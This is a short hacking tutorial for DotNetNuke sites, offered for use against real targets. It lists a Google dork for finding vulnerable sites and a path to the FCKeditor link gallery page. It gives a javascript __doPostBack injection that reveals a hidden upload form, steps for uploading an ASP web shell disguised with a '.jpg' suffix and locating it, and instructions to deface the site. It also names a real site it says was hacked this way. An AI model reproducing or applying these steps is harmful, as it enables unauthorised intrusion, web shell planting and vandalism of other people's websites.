DNN (Dotnetnuke) Hacking tutorial by xW3s13y
DNN hacking



NOTE BEFORE WE START : YOU CAN USE ANY BROWSER IN STEP 1 AND 2 . BUT IF YOU ARE NOW IN STEP 3 OPEN INTERNET EXPLORER . IN INTERNET EXPLORER ADDRESS TAB . THERE YOU WILL PASTE THE    javascript :__doPostBack('ctlURL$cmdUpload','')   AND HIT ENTER ! DONT CLOSE THE 	PREVIOUS BROWSER !


Step one: Google dork (inurl:/tabid/36/language/en-US/Default.aspx)
 


Step two: Replace /tabid/36/language/en-US/Default.aspx with
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
 


NOTE : WHEN YOU ENCOUNTER 
Link Gallery
URL: 	
Use selected link

FIND ANOTHER TARGET . IT MEANS ITS NOT VULN . BUT WHEN YOU SEE AN UPLOAD BUTTONS LIKE THAT ! ITS JACKPOT :D



Step three: Make sure you check root
 



Step four: Place javascript code in url then enter
javascript :__doPostBack('ctlURL$cmdUpload','')
Delete the space after javascript
 



Step five: Upload bar will appear, upload your asp shell.
 
Step six: Locate shell
The shell location will be like this.


http://www.example.com/portals/0/cmd.asp;.fun.jpg
 


Step seven: DEFACE IT . PUT YOUR DEFACEMENT PAGE IN INDEX.HTML OR CREATE AN HTML CONTAINING YOUR DEFACEMENT PAGE !

GOOD LUCK !  EXAMPLE OF HACK SITES USING THIS METHOD !


-- http://www.seth.pt/ --- ( Hacked by Kai Zen )

`xW3s13y